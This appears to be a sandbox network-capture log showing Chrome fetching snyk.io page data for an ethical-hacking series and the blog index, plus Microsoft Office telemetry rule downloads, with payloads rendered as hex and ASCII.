                                                                                                                                                                                                                                                                                                              146192.168.2.54990823.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC439OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/series/ethical-hacking.json?slug=ethical-hacking HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC631INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"145mex9e84l1hc6"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/series/[...slug].json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::swkkr-1729799356423-786554575208
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:16 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799356.1096592
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC15753INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 37 61 5a 74 6c 72 63 34 65 43 4d 59 6e 39 72 42 38 78 46 6a 74 69 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 36 2d 30 32 54 31 30 3a 33 35 3a 30 37 2e 38 33 37 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 31 30 2d 31 30 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7aZtlrc4eCMYn9rB8xFjti","type":"Entry","createdAt":"2023-06-02T10:35:07.837Z","updatedAt":"2024-10-10T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC8835INData Raw: 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 55 6e 63 6f 76 65 72 20 65 6e 74 72 79 20 70 6f 69 6e 74 73 20 69 6e 20 66 69 72 65 77 61 6c 6c 73 2c 20 69 6e 74 72 75 73 69 6f 6e 20 64 65 74 65 63 74 69 6f 6e 20 73 79 73 74 65 6d 73 2c 20 61 6e 64 20 68 6f 6e 65 79 70 6f 74 73 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 6c 69 73 74 2d 69 74 65 6d 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: {"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"Uncover entry points in firewalls, intrusion detection systems, and honeypots","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"list-item"},{"data":{},"content":[{"data":{}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 61 6e 63 68 6f 72 3a 73 74 61 6e 64 61 72 64 73 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 45 74 68 69 63 61 6c 20 68 61 63 6b 69 6e 67 20 73 74 61 6e 64 61 72 64 73 20 61 6e 64 20 63 65 72 74 69 66 69 63 61 74 69 6f 6e 73 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 79 70 65 72 6c 69 6e 6b 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 65 61 64 69 6e 67 2d 32 22 7d 2c 7b 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000"data":{"uri":"anchor:standards"},"content":[{"data":{},"marks":[],"value":"Ethical hacking standards and certifications","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":"","nodeType":"text"}],"nodeType":"heading-2"},{"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC8204INData Raw: 22 6c 61 62 65 6c 22 3a 22 53 6e 79 6b 20 4f 70 65 6e 20 53 6f 75 72 63 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 41 76 6f 69 64 20 76 75 6c 6e 65 72 61 62 6c 65 20 64 65 70 65 6e 64 65 6e 63 69 65 73 22 2c 22 75 72 6c 22 3a 22 2f 70 72 6f 64 75 63 74 2f 6f 70 65 6e 2d 73 6f 75 72 63 65 2d 73 65 63 75 72 69 74 79 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 73 6e 79 6b 2d 6f 73 73 22 7d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 36 53 55 38 4c 76 79 77 30 58 31 78 70 4b 5a 66 63 55 43 71 4d 35 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74
                                                                                                                                                                                                                                                                                                              Data Ascii: "label":"Snyk Open Source","description":"Avoid vulnerable dependencies","url":"/product/open-source-security-management/","appearance":{"navItem":{"icon":"snyk-oss"}}},{"sys":{"id":"6SU8Lvyw0X1xpKZfcUCqM5","__typename":"Sys"},"__typename":"ContentNavigat
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 73 70 6f 74 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 22 3a 66 61 6c 73 65 2c 22 74 69 74 6c 65 54 65 78 74 22 3a 6e 75 6c 6c 2c 22 73 75 62 6d 65 6e 75 4c 69 6e 6b 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 49 74 65 6d 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 36 63 71 54 73 36 41 33 73 4c 32 52 33 54 38 4b 33 52 79 72 43 35 22 2c 22 5f
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":null,"spotlightFirstItem":false,"titleText":null,"submenuLinks":{"__typename":"NavigationDropdownMenuColumnRowItemsCollection","items":[{"sys":{"id":"6cqTs6A3sL2R3T8K3RyrC5","_
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC12INData Raw: 66 6f 6f 74 65 72 4e 61 76 49 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: footerNavI
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC3639INData Raw: 30 30 30 30 30 45 32 42 0d 0a 74 65 6d 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 46 6f 6f 74 65 72 43 61 74 65 67 6f 72 79 49 74 65 6d 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 34 4b 69 77 30 32 4b 78 5a 76 35 55 41 6b 57 78 45 65 56 57 56 4a 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 53 6e 79 6b 20 57 69 74 68 20 47 69 74 48 75 62 22 2c 22 75 72 6c 22 3a 22 2f 63 6f 6d 70 61 72 69 73 6f 6e 2f 67 69 74 68 75 62 2d 61 6e 64 2d 73 6e 79 6b 2f 22 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000E2Btems":{"__typename":"NavigationFooterCategoryItemsCollection","items":[{"sys":{"id":"4Kiw02KxZv5UAkWxEeVWVJ","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Snyk With GitHub","url":"/comparison/github-and-snyk/"},{"sys":{"id":"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              147192.168.2.54991113.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:16 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 2d861f62-501e-0064-3bf5-241f54000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194916Z-15b8d89586fzhrwgk23ex2bvhw000000028g0000000082k4
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              148192.168.2.54991213.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:16 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 42f5c72c-c01e-00a1-6643-267e4a000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194916Z-16849878b787c9z7hb8u9yysp0000000087g00000000hvam
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              149192.168.2.54990523.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:16 UTC400OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/blog.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC600INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"j0zluy8bo847ww"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /en-US/blog
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: MISS
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::swkkr-1729799356512-43a2db6d6b86
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:16 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799356.10965ee
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC15784INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 30 6e 42 70 65 73 58 4e 45 32 7a 6d 62 4a 6b 68 53 68 49 78 48 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 30 38 2d 33 31 54 31 34 3a 35 30 3a 32 35 2e 34 38 38 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 31 30 2d 31 38 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"30nBpesXNE2zmbJkhShIxH","type":"Entry","createdAt":"2022-08-31T14:50:25.488Z","updatedAt":"2024-10-18T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC8804INData Raw: 69 6d 65 20 77 65 20 61 73 6b 20 66 6f 72 20 61 20 71 75 65 72 79 2c 20 77 65 20 67 65 74 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 74 61 72 67 65 74 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 37 45 61 41 41 66 4b 48 71 78 42 36 70 44 44 33 45 47 6c 6a 50 77 22
                                                                                                                                                                                                                                                                                                              Data Ascii: ime we ask for a query, we get the following: ","nodeType":"text"}],"nodeType":"paragraph"},{"data":{"target":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7EaAAfKHqxB6pDD3EGljPw"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 20 63 61 6e 20 68 65 6c 70 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 62 6f 6c 64 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 70 72 69 6f 72 69 74 69 7a 65 20 61 6e 64 20 74 72 69 61 67 65 20 74 68 65 20 62 61 63 6b 6c 6f 67 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 20 6f 66 20 69 73 73 75 65 73 20 70 65 72 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000Type":"text"},{"data":{},"marks":[],"value":" can help ","nodeType":"text"},{"data":{},"marks":[{"type":"bold"}],"value":"prioritize and triage the backlog","nodeType":"text"},{"data":{},"marks":[],"value":" of issues per ","nodeType":"text"},{"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC8204INData Raw: 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 75 6e 64 65 72 6c 69 6e 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 43 56 45 2d 32 30 32 34 2d 32 33 36 35 31 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 79 70 65 72 6c 69 6e 6b 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 3a 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 2f 62 6c 6f 67 2f 63 76 65 2d 32 30 32 34 2d 32 33 36 35 31 2d 64 6f 63 6b 65 72 2d 62 75 69 6c 64 6b 69 74 2d 6d 6f 75 6e 74 2d 63 61 63 68 65 2d 72 61 63 65 2f 22 7d 2c 22 63 6f 6e 74 65 6e 74 22
                                                                                                                                                                                                                                                                                                              Data Ascii: ntent":[{"data":{},"marks":[{"type":"underline"}],"value":"CVE-2024-23651","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value":": ","nodeType":"text"},{"data":{"uri":"/blog/cve-2024-23651-docker-buildkit-mount-cache-race/"},"content"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 69 70 65 6c 69 6e 65 73 2c 20 6f 6e 20 62 75 69 6c 64 20 73 65 72 76 65 72 73 2c 20 61 6e 64 20 6f 6e 20 79 6f 75 72 20 64 65 76 65 6c 6f 70 65 72 73 27 20 77 6f 72 6b 73 74 61 74 69 6f 6e 73 2e 20 49 74 e2 80 99 73 20 61 6c 73 6f 20 69 6d 70 6f 72 74 61 6e 74 20 74 6f 20 73 63 72 65 65 6e 20 65 78 69 73 74 69 6e 67 20 63 6f 6e 74 61 69 6e 65 72 73 20 75 73 69 6e 67 20 74 6f 6f 6c 73 20 6c 69 6b 65 20 74 68 65 20 6f 6e 65 73 20 53 6e 79 6b 20 62 75 69 6c 74 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 69 66 20 79 6f 75 72 20 6f 72 63 68 65 73 74 72 61 74 69 6f 6e 20 6e 6f 64 65 73 20 6f 72 20 62 75 69 6c 64 20 69 6e 66 72 61 73 74 72 75 63 74 75 72 65 20 68 61 76 65 20 61 6c 72 65 61 64 79 20 62 65 65 6e 20 69 6d 70 61 63 74 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000ipelines, on build servers, and on your developers' workstations. Its also important to screen existing containers using tools like the ones Snyk built to determine if your orchestration nodes or build infrastructure have already been impacte
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:17 UTC12INData Raw: 65 54 79 70 65 22 3a 22 74 65 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: eType":"te
